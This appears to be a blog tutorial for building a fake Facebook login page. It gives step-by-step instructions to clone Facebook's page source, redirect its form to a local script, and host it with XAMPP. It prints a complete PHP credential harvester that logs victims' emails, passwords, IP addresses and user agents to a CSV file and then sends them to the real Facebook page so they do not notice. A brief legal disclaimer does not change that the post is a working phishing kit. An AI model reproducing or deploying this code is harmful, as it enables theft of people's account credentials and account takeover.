Fake Facebook Phishing Page

Capturing username and password using phishing page

Legal disclaimer:

Usage of phishing for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


Step 1: Install "Xampp" and "Start" the "Apache Service".

Step 2: "Open facebook.com" and "Copy" the "Source Code" (ctrl + U) into a "Notepad File".

Search for "Action=" in the code and "replace" the "URL" following it with "capture.php"

(only first 2 occurances needs to be changed)

Save it as "index.html"


Step 3: "Create" a new "php file" and write the following code in it:

<?php

// Redirect

header("Location:https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110");

// Get IP address

$ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];

// Get user-agent

$useragent = $_SERVER['HTTP_USER_AGENT'];

// Save credentials, IP address and user-agent

if(isset($_POST[email]) && isset($_POST[pass])) {$file = fopen("dump.csv", "a");fputcsv($file, array($_POST[email], $_POST[pass], $ip, $useragent));fclose($file);}

// Exit

exit;

?>

"Save" this file as "capture.php"


Step 4: "Navigate" to "C:\xampp\htdocs\"

Create a new folder with the name "facebook" (u can choose any random name)

Copy and paste the "index.html" and "capture.php" file here.

"Create" a new file with the name "dump.csv"  (to save the captured data)

Step 5: "Open" any "Browser" and open "http://localhost/facebook/"

"Duplicate page" will be "Opened", enter the credentials here.

After providing the credentials it will redirect you to the login attempt page.

Step 6: "Open" up the folder where the "dump.csv" file is kept

Open dump.csv file to find the "Captured Password".


Comments

Popular posts from this blog

OSINT Tool in Termux

Active Directory Ransomware Attacks

How to perform a Man-in-the-middle (MITM) attack with Kali Linux